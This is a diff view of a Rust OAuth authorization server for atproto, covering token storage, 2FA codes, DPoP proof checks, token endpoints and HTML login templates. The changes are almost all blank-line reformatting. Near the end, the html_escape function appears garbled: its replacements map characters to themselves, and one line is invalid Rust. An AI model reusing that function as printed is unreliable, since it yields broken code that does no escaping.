···
220
}
221
Ok(tokens)
222
}
223
pub async fn count_tokens_for_user(pool: &PgPool, did: &str) -> Result<i64, OAuthError> {
224
let count = sqlx::query_scalar!(
225
r#"
···
231
.await?;
232
Ok(count)
233
}
234
pub async fn delete_oldest_tokens_for_user(
235
pool: &PgPool,
236
did: &str,
···
253
.await?;
254
Ok(result.rows_affected())
255
}
256
const MAX_TOKENS_PER_USER: i64 = 100;
257
pub async fn enforce_token_limit_for_user(pool: &PgPool, did: &str) -> Result<(), OAuthError> {
258
let count = count_tokens_for_user(pool, did).await?;
259
if count > MAX_TOKENS_PER_USER {
···
2
use sqlx::PgPool;
3
use super::super::{OAuthError, TokenData};
4
use super::helpers::{from_json, to_json};
5
+
6
pub async fn create_token(
7
pool: &PgPool,
8
data: &TokenData,
···
35
.await?;
36
Ok(row.id)
37
}
38
+
39
pub async fn get_token_by_id(
40
pool: &PgPool,
41
token_id: &str,
···
70
None => Ok(None),
71
}
72
}
73
+
74
pub async fn get_token_by_refresh_token(
75
pool: &PgPool,
76
refresh_token: &str,
···
108
None => Ok(None),
109
}
110
}
111
+
112
pub async fn rotate_token(
113
pool: &PgPool,
114
old_db_id: i32,
···
153
tx.commit().await?;
154
Ok(())
155
}
156
+
157
pub async fn check_refresh_token_used(
158
pool: &PgPool,
159
refresh_token: &str,
···
168
.await?;
169
Ok(row)
170
}
171
+
172
pub async fn delete_token(pool: &PgPool, token_id: &str) -> Result<(), OAuthError> {
173
sqlx::query!(
174
r#"
···
180
.await?;
181
Ok(())
182
}
183
+
184
pub async fn delete_token_family(pool: &PgPool, db_id: i32) -> Result<(), OAuthError> {
185
sqlx::query!(
186
r#"
···
192
.await?;
193
Ok(())
194
}
195
+
196
pub async fn list_tokens_for_user(
197
pool: &PgPool,
198
did: &str,
···
228
}
229
Ok(tokens)
230
}
231
+
232
pub async fn count_tokens_for_user(pool: &PgPool, did: &str) -> Result<i64, OAuthError> {
233
let count = sqlx::query_scalar!(
234
r#"
···
240
.await?;
241
Ok(count)
242
}
243
+
244
pub async fn delete_oldest_tokens_for_user(
245
pool: &PgPool,
246
did: &str,
···
263
.await?;
264
Ok(result.rows_affected())
265
}
266
+
267
const MAX_TOKENS_PER_USER: i64 = 100;
268
+
269
pub async fn enforce_token_limit_for_user(pool: &PgPool, did: &str) -> Result<(), OAuthError> {
270
let count = count_tokens_for_user(pool, did).await?;
271
if count > MAX_TOKENS_PER_USER {
+9
src/oauth/db/two_factor.rs
+9
src/oauth/db/two_factor.rs
···
3
use sqlx::PgPool;
4
use uuid::Uuid;
5
use super::super::OAuthError;
6
pub struct TwoFactorChallenge {
7
pub id: Uuid,
8
pub did: String,
···
12
pub created_at: DateTime<Utc>,
13
pub expires_at: DateTime<Utc>,
14
}
15
pub fn generate_2fa_code() -> String {
16
let mut rng = rand::thread_rng();
17
let code: u32 = rng.gen_range(0..1_000_000);
18
format!("{:06}", code)
19
}
20
pub async fn create_2fa_challenge(
21
pool: &PgPool,
22
did: &str,
···
47
expires_at: row.expires_at,
48
})
49
}
50
pub async fn get_2fa_challenge(
51
pool: &PgPool,
52
request_uri: &str,
···
71
expires_at: r.expires_at,
72
}))
73
}
74
pub async fn increment_2fa_attempts(pool: &PgPool, id: Uuid) -> Result<i32, OAuthError> {
75
let row = sqlx::query!(
76
r#"
···
85
.await?;
86
Ok(row.attempts)
87
}
88
pub async fn delete_2fa_challenge(pool: &PgPool, id: Uuid) -> Result<(), OAuthError> {
89
sqlx::query!(
90
r#"
···
96
.await?;
97
Ok(())
98
}
99
pub async fn delete_2fa_challenge_by_request_uri(
100
pool: &PgPool,
101
request_uri: &str,
···
110
.await?;
111
Ok(())
112
}
113
pub async fn cleanup_expired_2fa_challenges(pool: &PgPool) -> Result<u64, OAuthError> {
114
let result = sqlx::query!(
115
r#"
···
120
.await?;
121
Ok(result.rows_affected())
122
}
123
pub async fn check_user_2fa_enabled(pool: &PgPool, did: &str) -> Result<bool, OAuthError> {
124
let row = sqlx::query!(
125
r#"
···
3
use sqlx::PgPool;
4
use uuid::Uuid;
5
use super::super::OAuthError;
6
+
7
pub struct TwoFactorChallenge {
8
pub id: Uuid,
9
pub did: String,
···
13
pub created_at: DateTime<Utc>,
14
pub expires_at: DateTime<Utc>,
15
}
16
+
17
pub fn generate_2fa_code() -> String {
18
let mut rng = rand::thread_rng();
19
let code: u32 = rng.gen_range(0..1_000_000);
20
format!("{:06}", code)
21
}
22
+
23
pub async fn create_2fa_challenge(
24
pool: &PgPool,
25
did: &str,
···
50
expires_at: row.expires_at,
51
})
52
}
53
+
54
pub async fn get_2fa_challenge(
55
pool: &PgPool,
56
request_uri: &str,
···
75
expires_at: r.expires_at,
76
}))
77
}
78
+
79
pub async fn increment_2fa_attempts(pool: &PgPool, id: Uuid) -> Result<i32, OAuthError> {
80
let row = sqlx::query!(
81
r#"
···
90
.await?;
91
Ok(row.attempts)
92
}
93
+
94
pub async fn delete_2fa_challenge(pool: &PgPool, id: Uuid) -> Result<(), OAuthError> {
95
sqlx::query!(
96
r#"
···
102
.await?;
103
Ok(())
104
}
105
+
106
pub async fn delete_2fa_challenge_by_request_uri(
107
pool: &PgPool,
108
request_uri: &str,
···
117
.await?;
118
Ok(())
119
}
120
+
121
pub async fn cleanup_expired_2fa_challenges(pool: &PgPool) -> Result<u64, OAuthError> {
122
let result = sqlx::query!(
123
r#"
···
128
.await?;
129
Ok(result.rows_affected())
130
}
131
+
132
pub async fn check_user_2fa_enabled(pool: &PgPool, did: &str) -> Result<bool, OAuthError> {
133
let row = sqlx::query!(
134
r#"
+20
src/oauth/dpop.rs
+20
src/oauth/dpop.rs
···
3
use chrono::Utc;
4
use serde::{Deserialize, Serialize};
5
use sha2::{Digest, Sha256};
6
use super::OAuthError;
7
const DPOP_NONCE_VALIDITY_SECS: i64 = 300;
8
const DPOP_MAX_AGE_SECS: i64 = 300;
9
#[derive(Debug, Clone)]
10
pub struct DPoPVerifyResult {
11
pub jkt: String,
12
pub jti: String,
13
}
14
#[derive(Debug, Clone, Serialize, Deserialize)]
15
pub struct DPoPProofHeader {
16
pub typ: String,
17
pub alg: String,
18
pub jwk: DPoPJwk,
19
}
20
#[derive(Debug, Clone, Serialize, Deserialize)]
21
pub struct DPoPJwk {
22
pub kty: String,
···
27
#[serde(skip_serializing_if = "Option::is_none")]
28
pub y: Option<String>,
29
}
30
#[derive(Debug, Clone, Serialize, Deserialize)]
31
pub struct DPoPProofPayload {
32
pub jti: String,
···
38
#[serde(skip_serializing_if = "Option::is_none")]
39
pub nonce: Option<String>,
40
}
41
pub struct DPoPVerifier {
42
secret: Vec<u8>,
43
}
44
impl DPoPVerifier {
45
pub fn new(secret: &[u8]) -> Self {
46
Self {
47
secret: secret.to_vec(),
48
}
49
}
50
pub fn generate_nonce(&self) -> String {
51
let timestamp = Utc::now().timestamp();
52
let timestamp_bytes = timestamp.to_be_bytes();
···
59
nonce_data.extend_from_slice(&hash[..16]);
60
URL_SAFE_NO_PAD.encode(&nonce_data)
61
}
62
pub fn validate_nonce(&self, nonce: &str) -> Result<(), OAuthError> {
63
let nonce_bytes = URL_SAFE_NO_PAD
64
.decode(nonce)
···
83
}
84
Ok(())
85
}
86
pub fn verify_proof(
87
&self,
88
dpop_header: &str,
···
152
})
153
}
154
}
155
fn verify_dpop_signature(
156
alg: &str,
157
jwk: &DPoPJwk,
···
168
))),
169
}
170
}
171
fn verify_es256(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> {
172
use p256::ecdsa::signature::Verifier;
173
use p256::ecdsa::{Signature, VerifyingKey};
···
208
.verify(message, &sig)
209
.map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string()))
210
}
211
fn verify_es384(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> {
212
use p384::ecdsa::signature::Verifier;
213
use p384::ecdsa::{Signature, VerifyingKey};
···
248
.verify(message, &sig)
249
.map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string()))
250
}
251
fn verify_eddsa(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> {
252
use ed25519_dalek::{Signature, VerifyingKey};
253
let crv = jwk.crv.as_ref().ok_or_else(|| {
···
277
.verify_strict(message, &sig)
278
.map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string()))
279
}
280
pub fn compute_jwk_thumbprint(jwk: &DPoPJwk) -> Result<String, OAuthError> {
281
let canonical = match jwk.kty.as_str() {
282
"EC" => {
···
319
let hash = hasher.finalize();
320
Ok(URL_SAFE_NO_PAD.encode(&hash))
321
}
322
pub fn compute_access_token_hash(access_token: &str) -> String {
323
let mut hasher = Sha256::new();
324
hasher.update(access_token.as_bytes());
325
let hash = hasher.finalize();
326
URL_SAFE_NO_PAD.encode(&hash)
327
}
328
#[cfg(test)]
329
mod tests {
330
use super::*;
331
#[test]
332
fn test_nonce_generation_and_validation() {
333
let secret = b"test-secret-key-32-bytes-long!!!";
···
335
let nonce = verifier.generate_nonce();
336
assert!(verifier.validate_nonce(&nonce).is_ok());
337
}
338
#[test]
339
fn test_jwk_thumbprint_ec() {
340
let jwk = DPoPJwk {
···
3
use chrono::Utc;
4
use serde::{Deserialize, Serialize};
5
use sha2::{Digest, Sha256};
6
+
7
use super::OAuthError;
8
+
9
const DPOP_NONCE_VALIDITY_SECS: i64 = 300;
10
const DPOP_MAX_AGE_SECS: i64 = 300;
11
+
12
#[derive(Debug, Clone)]
13
pub struct DPoPVerifyResult {
14
pub jkt: String,
15
pub jti: String,
16
}
17
+
18
#[derive(Debug, Clone, Serialize, Deserialize)]
19
pub struct DPoPProofHeader {
20
pub typ: String,
21
pub alg: String,
22
pub jwk: DPoPJwk,
23
}
24
+
25
#[derive(Debug, Clone, Serialize, Deserialize)]
26
pub struct DPoPJwk {
27
pub kty: String,
···
32
#[serde(skip_serializing_if = "Option::is_none")]
33
pub y: Option<String>,
34
}
35
+
36
#[derive(Debug, Clone, Serialize, Deserialize)]
37
pub struct DPoPProofPayload {
38
pub jti: String,
···
44
#[serde(skip_serializing_if = "Option::is_none")]
45
pub nonce: Option<String>,
46
}
47
+
48
pub struct DPoPVerifier {
49
secret: Vec<u8>,
50
}
51
+
52
impl DPoPVerifier {
53
pub fn new(secret: &[u8]) -> Self {
54
Self {
55
secret: secret.to_vec(),
56
}
57
}
58
+
59
pub fn generate_nonce(&self) -> String {
60
let timestamp = Utc::now().timestamp();
61
let timestamp_bytes = timestamp.to_be_bytes();
···
68
nonce_data.extend_from_slice(&hash[..16]);
69
URL_SAFE_NO_PAD.encode(&nonce_data)
70
}
71
+
72
pub fn validate_nonce(&self, nonce: &str) -> Result<(), OAuthError> {
73
let nonce_bytes = URL_SAFE_NO_PAD
74
.decode(nonce)
···
93
}
94
Ok(())
95
}
96
+
97
pub fn verify_proof(
98
&self,
99
dpop_header: &str,
···
163
})
164
}
165
}
166
+
167
fn verify_dpop_signature(
168
alg: &str,
169
jwk: &DPoPJwk,
···
180
))),
181
}
182
}
183
+
184
fn verify_es256(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> {
185
use p256::ecdsa::signature::Verifier;
186
use p256::ecdsa::{Signature, VerifyingKey};
···
221
.verify(message, &sig)
222
.map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string()))
223
}
224
+
225
fn verify_es384(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> {
226
use p384::ecdsa::signature::Verifier;
227
use p384::ecdsa::{Signature, VerifyingKey};
···
262
.verify(message, &sig)
263
.map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string()))
264
}
265
+
266
fn verify_eddsa(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> {
267
use ed25519_dalek::{Signature, VerifyingKey};
268
let crv = jwk.crv.as_ref().ok_or_else(|| {
···
292
.verify_strict(message, &sig)
293
.map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string()))
294
}
295
+
296
pub fn compute_jwk_thumbprint(jwk: &DPoPJwk) -> Result<String, OAuthError> {
297
let canonical = match jwk.kty.as_str() {
298
"EC" => {
···
335
let hash = hasher.finalize();
336
Ok(URL_SAFE_NO_PAD.encode(&hash))
337
}
338
+
339
pub fn compute_access_token_hash(access_token: &str) -> String {
340
let mut hasher = Sha256::new();
341
hasher.update(access_token.as_bytes());
342
let hash = hasher.finalize();
343
URL_SAFE_NO_PAD.encode(&hash)
344
}
345
+
346
#[cfg(test)]
347
mod tests {
348
use super::*;
349
+
350
#[test]
351
fn test_nonce_generation_and_validation() {
352
let secret = b"test-secret-key-32-bytes-long!!!";
···
354
let nonce = verifier.generate_nonce();
355
assert!(verifier.validate_nonce(&nonce).is_ok());
356
}
357
+
358
#[test]
359
fn test_jwk_thumbprint_ec() {
360
let jwk = DPoPJwk {
+5
src/oauth/endpoints/metadata.rs
+5
src/oauth/endpoints/metadata.rs
···
2
use serde::{Deserialize, Serialize};
3
use crate::state::AppState;
4
use crate::oauth::jwks::{JwkSet, create_jwk_set};
5
#[derive(Debug, Serialize, Deserialize)]
6
pub struct ProtectedResourceMetadata {
7
pub resource: String,
···
11
#[serde(skip_serializing_if = "Option::is_none")]
12
pub resource_documentation: Option<String>,
13
}
14
#[derive(Debug, Serialize, Deserialize)]
15
pub struct AuthorizationServerMetadata {
16
pub issuer: String,
···
43
#[serde(skip_serializing_if = "Option::is_none")]
44
pub introspection_endpoint: Option<String>,
45
}
46
pub async fn oauth_protected_resource(
47
State(_state): State<AppState>,
48
) -> Json<ProtectedResourceMetadata> {
···
56
resource_documentation: Some("https://atproto.com".to_string()),
57
})
58
}
59
pub async fn oauth_authorization_server(
60
State(_state): State<AppState>,
61
) -> Json<AuthorizationServerMetadata> {
···
96
introspection_endpoint: Some(format!("{}/oauth/introspect", issuer)),
97
})
98
}
99
pub async fn oauth_jwks(State(_state): State<AppState>) -> Json<JwkSet> {
100
use crate::config::AuthConfig;
101
use crate::oauth::jwks::Jwk;
···
2
use serde::{Deserialize, Serialize};
3
use crate::state::AppState;
4
use crate::oauth::jwks::{JwkSet, create_jwk_set};
5
+
6
#[derive(Debug, Serialize, Deserialize)]
7
pub struct ProtectedResourceMetadata {
8
pub resource: String,
···
12
#[serde(skip_serializing_if = "Option::is_none")]
13
pub resource_documentation: Option<String>,
14
}
15
+
16
#[derive(Debug, Serialize, Deserialize)]
17
pub struct AuthorizationServerMetadata {
18
pub issuer: String,
···
45
#[serde(skip_serializing_if = "Option::is_none")]
46
pub introspection_endpoint: Option<String>,
47
}
48
+
49
pub async fn oauth_protected_resource(
50
State(_state): State<AppState>,
51
) -> Json<ProtectedResourceMetadata> {
···
59
resource_documentation: Some("https://atproto.com".to_string()),
60
})
61
}
62
+
63
pub async fn oauth_authorization_server(
64
State(_state): State<AppState>,
65
) -> Json<AuthorizationServerMetadata> {
···
100
introspection_endpoint: Some(format!("{}/oauth/introspect", issuer)),
101
})
102
}
103
+
104
pub async fn oauth_jwks(State(_state): State<AppState>) -> Json<JwkSet> {
105
use crate::config::AuthConfig;
106
use crate::oauth::jwks::Jwk;
+1
src/oauth/endpoints/mod.rs
+1
src/oauth/endpoints/mod.rs
+6
src/oauth/endpoints/par.rs
+6
src/oauth/endpoints/par.rs
···
11
client::ClientMetadataCache,
12
db,
13
};
14
const PAR_EXPIRY_SECONDS: i64 = 600;
15
const SUPPORTED_SCOPES: &[&str] = &["atproto", "transition:generic", "transition:chat.bsky"];
16
#[derive(Debug, Deserialize)]
17
pub struct ParRequest {
18
pub response_type: String,
···
37
#[serde(default)]
38
pub client_assertion_type: Option<String>,
39
}
40
#[derive(Debug, Serialize)]
41
pub struct ParResponse {
42
pub request_uri: String,
43
pub expires_in: u64,
44
}
45
pub async fn pushed_authorization_request(
46
State(state): State<AppState>,
47
headers: HeaderMap,
···
115
expires_in: PAR_EXPIRY_SECONDS as u64,
116
}))
117
}
118
fn determine_client_auth(request: &ParRequest) -> Result<ClientAuth, OAuthError> {
119
if let (Some(assertion), Some(assertion_type)) =
120
(&request.client_assertion, &request.client_assertion_type)
···
135
}
136
Ok(ClientAuth::None)
137
}
138
fn validate_scope(
139
requested_scope: &Option<String>,
140
client_metadata: &crate::oauth::client::ClientMetadata,
···
11
client::ClientMetadataCache,
12
db,
13
};
14
+
15
const PAR_EXPIRY_SECONDS: i64 = 600;
16
const SUPPORTED_SCOPES: &[&str] = &["atproto", "transition:generic", "transition:chat.bsky"];
17
+
18
#[derive(Debug, Deserialize)]
19
pub struct ParRequest {
20
pub response_type: String,
···
39
#[serde(default)]
40
pub client_assertion_type: Option<String>,
41
}
42
+
43
#[derive(Debug, Serialize)]
44
pub struct ParResponse {
45
pub request_uri: String,
46
pub expires_in: u64,
47
}
48
+
49
pub async fn pushed_authorization_request(
50
State(state): State<AppState>,
51
headers: HeaderMap,
···
119
expires_in: PAR_EXPIRY_SECONDS as u64,
120
}))
121
}
122
+
123
fn determine_client_auth(request: &ParRequest) -> Result<ClientAuth, OAuthError> {
124
if let (Some(assertion), Some(assertion_type)) =
125
(&request.client_assertion, &request.client_assertion_type)
···
140
}
141
Ok(ClientAuth::None)
142
}
143
+
144
fn validate_scope(
145
requested_scope: &Option<String>,
146
client_metadata: &crate::oauth::client::ClientMetadata,
+3
src/oauth/endpoints/token/grants.rs
+3
src/oauth/endpoints/token/grants.rs
···
11
};
12
use super::types::{TokenRequest, TokenResponse};
13
use super::helpers::{create_access_token, verify_pkce};
14
const ACCESS_TOKEN_EXPIRY_SECONDS: i64 = 3600;
15
const REFRESH_TOKEN_EXPIRY_DAYS: i64 = 60;
16
pub async fn handle_authorization_code_grant(
17
state: AppState,
18
_headers: HeaderMap,
···
125
}),
126
))
127
}
128
pub async fn handle_refresh_token_grant(
129
state: AppState,
130
_headers: HeaderMap,
···
11
};
12
use super::types::{TokenRequest, TokenResponse};
13
use super::helpers::{create_access_token, verify_pkce};
14
+
15
const ACCESS_TOKEN_EXPIRY_SECONDS: i64 = 3600;
16
const REFRESH_TOKEN_EXPIRY_DAYS: i64 = 60;
17
+
18
pub async fn handle_authorization_code_grant(
19
state: AppState,
20
_headers: HeaderMap,
···
127
}),
128
))
129
}
130
+
131
pub async fn handle_refresh_token_grant(
132
state: AppState,
133
_headers: HeaderMap,
+5
src/oauth/endpoints/token/helpers.rs
+5
src/oauth/endpoints/token/helpers.rs
···
6
use subtle::ConstantTimeEq;
7
use crate::config::AuthConfig;
8
use crate::oauth::OAuthError;
9
const ACCESS_TOKEN_EXPIRY_SECONDS: i64 = 3600;
10
pub struct TokenClaims {
11
pub jti: String,
12
pub exp: i64,
13
pub iat: i64,
14
}
15
pub fn verify_pkce(code_challenge: &str, code_verifier: &str) -> Result<(), OAuthError> {
16
let mut hasher = Sha256::new();
17
hasher.update(code_verifier.as_bytes());
···
22
}
23
Ok(())
24
}
25
pub fn create_access_token(
26
token_id: &str,
27
sub: &str,
···
60
let signature_b64 = URL_SAFE_NO_PAD.encode(&signature);
61
Ok(format!("{}.{}", signing_input, signature_b64))
62
}
63
pub fn extract_token_claims(token: &str) -> Result<TokenClaims, OAuthError> {
64
let parts: Vec<&str> = token.split('.').collect();
65
if parts.len() != 3 {
···
6
use subtle::ConstantTimeEq;
7
use crate::config::AuthConfig;
8
use crate::oauth::OAuthError;
9
+
10
const ACCESS_TOKEN_EXPIRY_SECONDS: i64 = 3600;
11
+
12
pub struct TokenClaims {
13
pub jti: String,
14
pub exp: i64,
15
pub iat: i64,
16
}
17
+
18
pub fn verify_pkce(code_challenge: &str, code_verifier: &str) -> Result<(), OAuthError> {
19
let mut hasher = Sha256::new();
20
hasher.update(code_verifier.as_bytes());
···
25
}
26
Ok(())
27
}
28
+
29
pub fn create_access_token(
30
token_id: &str,
31
sub: &str,
···
64
let signature_b64 = URL_SAFE_NO_PAD.encode(&signature);
65
Ok(format!("{}.{}", signing_input, signature_b64))
66
}
67
+
68
pub fn extract_token_claims(token: &str) -> Result<TokenClaims, OAuthError> {
69
let parts: Vec<&str> = token.split('.').collect();
70
if parts.len() != 3 {
+5
src/oauth/endpoints/token/introspect.rs
+5
src/oauth/endpoints/token/introspect.rs
···
6
use crate::state::{AppState, RateLimitKind};
7
use crate::oauth::{OAuthError, db};
8
use super::helpers::extract_token_claims;
9
#[derive(Debug, Deserialize)]
10
pub struct RevokeRequest {
11
pub token: Option<String>,
12
#[serde(default)]
13
pub token_type_hint: Option<String>,
14
}
15
pub async fn revoke_token(
16
State(state): State<AppState>,
17
headers: HeaderMap,
···
31
}
32
Ok(StatusCode::OK)
33
}
34
#[derive(Debug, Deserialize)]
35
pub struct IntrospectRequest {
36
pub token: String,
37
#[serde(default)]
38
pub token_type_hint: Option<String>,
39
}
40
#[derive(Debug, Serialize)]
41
pub struct IntrospectResponse {
42
pub active: bool,
···
63
#[serde(skip_serializing_if = "Option::is_none")]
64
pub jti: Option<String>,
65
}
66
pub async fn introspect_token(
67
State(state): State<AppState>,
68
headers: HeaderMap,
···
6
use crate::state::{AppState, RateLimitKind};
7
use crate::oauth::{OAuthError, db};
8
use super::helpers::extract_token_claims;
9
+
10
#[derive(Debug, Deserialize)]
11
pub struct RevokeRequest {
12
pub token: Option<String>,
13
#[serde(default)]
14
pub token_type_hint: Option<String>,
15
}
16
+
17
pub async fn revoke_token(
18
State(state): State<AppState>,
19
headers: HeaderMap,
···
33
}
34
Ok(StatusCode::OK)
35
}
36
+
37
#[derive(Debug, Deserialize)]
38
pub struct IntrospectRequest {
39
pub token: String,
40
#[serde(default)]
41
pub token_type_hint: Option<String>,
42
}
43
+
44
#[derive(Debug, Serialize)]
45
pub struct IntrospectResponse {
46
pub active: bool,
···
67
#[serde(skip_serializing_if = "Option::is_none")]
68
pub jti: Option<String>,
69
}
70
+
71
pub async fn introspect_token(
72
State(state): State<AppState>,
73
headers: HeaderMap,
+4
src/oauth/endpoints/token/mod.rs
+4
src/oauth/endpoints/token/mod.rs
···
2
mod helpers;
3
mod introspect;
4
mod types;
5
use axum::{
6
Form, Json,
7
extract::State,
···
9
};
10
use crate::state::{AppState, RateLimitKind};
11
use crate::oauth::OAuthError;
12
pub use grants::{handle_authorization_code_grant, handle_refresh_token_grant};
13
pub use helpers::{create_access_token, extract_token_claims, verify_pkce, TokenClaims};
14
pub use introspect::{
15
introspect_token, revoke_token, IntrospectRequest, IntrospectResponse, RevokeRequest,
16
};
17
pub use types::{TokenRequest, TokenResponse};
18
fn extract_client_ip(headers: &HeaderMap) -> String {
19
if let Some(forwarded) = headers.get("x-forwarded-for") {
20
if let Ok(value) = forwarded.to_str() {
···
30
}
31
"unknown".to_string()
32
}
33
pub async fn token_endpoint(
34
State(state): State<AppState>,
35
headers: HeaderMap,
···
2
mod helpers;
3
mod introspect;
4
mod types;
5
+
6
use axum::{
7
Form, Json,
8
extract::State,
···
10
};
11
use crate::state::{AppState, RateLimitKind};
12
use crate::oauth::OAuthError;
13
+
14
pub use grants::{handle_authorization_code_grant, handle_refresh_token_grant};
15
pub use helpers::{create_access_token, extract_token_claims, verify_pkce, TokenClaims};
16
pub use introspect::{
17
introspect_token, revoke_token, IntrospectRequest, IntrospectResponse, RevokeRequest,
18
};
19
pub use types::{TokenRequest, TokenResponse};
20
+
21
fn extract_client_ip(headers: &HeaderMap) -> String {
22
if let Some(forwarded) = headers.get("x-forwarded-for") {
23
if let Ok(value) = forwarded.to_str() {
···
33
}
34
"unknown".to_string()
35
}
36
+
37
pub async fn token_endpoint(
38
State(state): State<AppState>,
39
headers: HeaderMap,
+2
src/oauth/endpoints/token/types.rs
+2
src/oauth/endpoints/token/types.rs
···
1
use serde::{Deserialize, Serialize};
2
+
3
#[derive(Debug, Deserialize)]
4
pub struct TokenRequest {
5
pub grant_type: String,
···
20
#[serde(default)]
21
pub client_assertion_type: Option<String>,
22
}
23
+
24
#[derive(Debug, Serialize)]
25
pub struct TokenResponse {
26
pub access_token: String,
+5
src/oauth/error.rs
+5
src/oauth/error.rs
···
4
response::{IntoResponse, Response},
5
};
6
use serde::Serialize;
7
#[derive(Debug)]
8
pub enum OAuthError {
9
InvalidRequest(String),
···
20
InvalidToken(String),
21
RateLimited,
22
}
23
#[derive(Serialize)]
24
struct OAuthErrorResponse {
25
error: String,
26
error_description: Option<String>,
27
}
28
impl IntoResponse for OAuthError {
29
fn into_response(self) -> Response {
30
let (status, error, description) = match self {
···
86
.into_response()
87
}
88
}
89
impl From<sqlx::Error> for OAuthError {
90
fn from(err: sqlx::Error) -> Self {
91
tracing::error!("Database error in OAuth flow: {}", err);
92
OAuthError::ServerError("An internal error occurred".to_string())
93
}
94
}
95
impl From<anyhow::Error> for OAuthError {
96
fn from(err: anyhow::Error) -> Self {
97
tracing::error!("Internal error in OAuth flow: {}", err);
···
4
response::{IntoResponse, Response},
5
};
6
use serde::Serialize;
7
+
8
#[derive(Debug)]
9
pub enum OAuthError {
10
InvalidRequest(String),
···
21
InvalidToken(String),
22
RateLimited,
23
}
24
+
25
#[derive(Serialize)]
26
struct OAuthErrorResponse {
27
error: String,
28
error_description: Option<String>,
29
}
30
+
31
impl IntoResponse for OAuthError {
32
fn into_response(self) -> Response {
33
let (status, error, description) = match self {
···
89
.into_response()
90
}
91
}
92
+
93
impl From<sqlx::Error> for OAuthError {
94
fn from(err: sqlx::Error) -> Self {
95
tracing::error!("Database error in OAuth flow: {}", err);
96
OAuthError::ServerError("An internal error occurred".to_string())
97
}
98
}
99
+
100
impl From<anyhow::Error> for OAuthError {
101
fn from(err: anyhow::Error) -> Self {
102
tracing::error!("Internal error in OAuth flow: {}", err);
+3
src/oauth/jwks.rs
+3
src/oauth/jwks.rs
···
1
use serde::{Deserialize, Serialize};
2
#[derive(Debug, Clone, Serialize, Deserialize)]
3
pub struct JwkSet {
4
pub keys: Vec<Jwk>,
5
}
6
#[derive(Debug, Clone, Serialize, Deserialize)]
7
pub struct Jwk {
8
pub kty: String,
···
19
#[serde(skip_serializing_if = "Option::is_none")]
20
pub y: Option<String>,
21
}
22
pub fn create_jwk_set(keys: Vec<Jwk>) -> JwkSet {
23
JwkSet { keys }
24
}
···
1
use serde::{Deserialize, Serialize};
2
+
3
#[derive(Debug, Clone, Serialize, Deserialize)]
4
pub struct JwkSet {
5
pub keys: Vec<Jwk>,
6
}
7
+
8
#[derive(Debug, Clone, Serialize, Deserialize)]
9
pub struct Jwk {
10
pub kty: String,
···
21
#[serde(skip_serializing_if = "Option::is_none")]
22
pub y: Option<String>,
23
}
24
+
25
pub fn create_jwk_set(keys: Vec<Jwk>) -> JwkSet {
26
JwkSet { keys }
27
}
+1
src/oauth/mod.rs
+1
src/oauth/mod.rs
+10
src/oauth/templates.rs
+10
src/oauth/templates.rs
···
1
use chrono::{DateTime, Utc};
2
fn base_styles() -> &'static str {
3
r#"
4
:root {
···
340
}
341
"#
342
}
343
pub fn login_page(
344
client_id: &str,
345
client_name: Option<&str>,
···
411
login_hint_value = html_escape(login_hint_value),
412
)
413
}
414
pub struct DeviceAccount {
415
pub did: String,
416
pub handle: String,
417
pub email: Option<String>,
418
pub last_used_at: DateTime<Utc>,
419
}
420
pub fn account_selector_page(
421
client_id: &str,
422
client_name: Option<&str>,
···
482
request_uri_encoded = urlencoding::encode(request_uri),
483
)
484
}
485
pub fn two_factor_page(
486
request_uri: &str,
487
channel: &str,
···
539
error_html = error_html,
540
)
541
}
542
pub fn error_page(error: &str, error_description: Option<&str>) -> String {
543
let description = error_description.unwrap_or("An error occurred during the authorization process.");
544
format!(
···
570
description = html_escape(description),
571
)
572
}
573
pub fn success_page(client_name: Option<&str>) -> String {
574
let client_display = client_name.unwrap_or("The application");
575
format!(
···
597
client_display = html_escape(client_display),
598
)
599
}
600
fn html_escape(s: &str) -> String {
601
s.replace('&', "&")
602
.replace('<', "<")
···
604
.replace('"', """)
605
.replace('\'', "'")
606
}
607
fn get_initials(handle: &str) -> String {
608
let clean = handle.trim_start_matches('@');
609
if clean.is_empty() {
···
611
}
612
clean.chars().next().unwrap_or('?').to_uppercase().to_string()
613
}
614
pub fn mask_email(email: &str) -> String {
615
if let Some(at_pos) = email.find('@') {
616
let local = &email[..at_pos];
···
1
use chrono::{DateTime, Utc};
2
+
3
fn base_styles() -> &'static str {
4
r#"
5
:root {
···
341
}
342
"#
343
}
344
+
345
pub fn login_page(
346
client_id: &str,
347
client_name: Option<&str>,
···
413
login_hint_value = html_escape(login_hint_value),
414
)
415
}
416
+
417
pub struct DeviceAccount {
418
pub did: String,
419
pub handle: String,
420
pub email: Option<String>,
421
pub last_used_at: DateTime<Utc>,
422
}
423
+
424
pub fn account_selector_page(
425
client_id: &str,
426
client_name: Option<&str>,
···
486
request_uri_encoded = urlencoding::encode(request_uri),
487
)
488
}
489
+
490
pub fn two_factor_page(
491
request_uri: &str,
492
channel: &str,
···
544
error_html = error_html,
545
)
546
}
547
+
548
pub fn error_page(error: &str, error_description: Option<&str>) -> String {
549
let description = error_description.unwrap_or("An error occurred during the authorization process.");
550
format!(
···
576
description = html_escape(description),
577
)
578
}
579
+
580
pub fn success_page(client_name: Option<&str>) -> String {
581
let client_display = client_name.unwrap_or("The application");
582
format!(
···
604
client_display = html_escape(client_display),
605
)
606
}
607
+
608
fn html_escape(s: &str) -> String {
609
s.replace('&', "&")
610
.replace('<', "<")
···
612
.replace('"', """)
613
.replace('\'', "'")
614
}
615
+
616
fn get_initials(handle: &str) -> String {
617
let clean = handle.trim_start_matches('@');
618
if clean.is_empty() {
···
620
}
621
clean.chars().next().unwrap_or('?').to_uppercase().to_string()
622
}
623
+
624
pub fn mask_email(email: &str) -> String {
625
if let Some(at_pos) = email.find('@') {
626
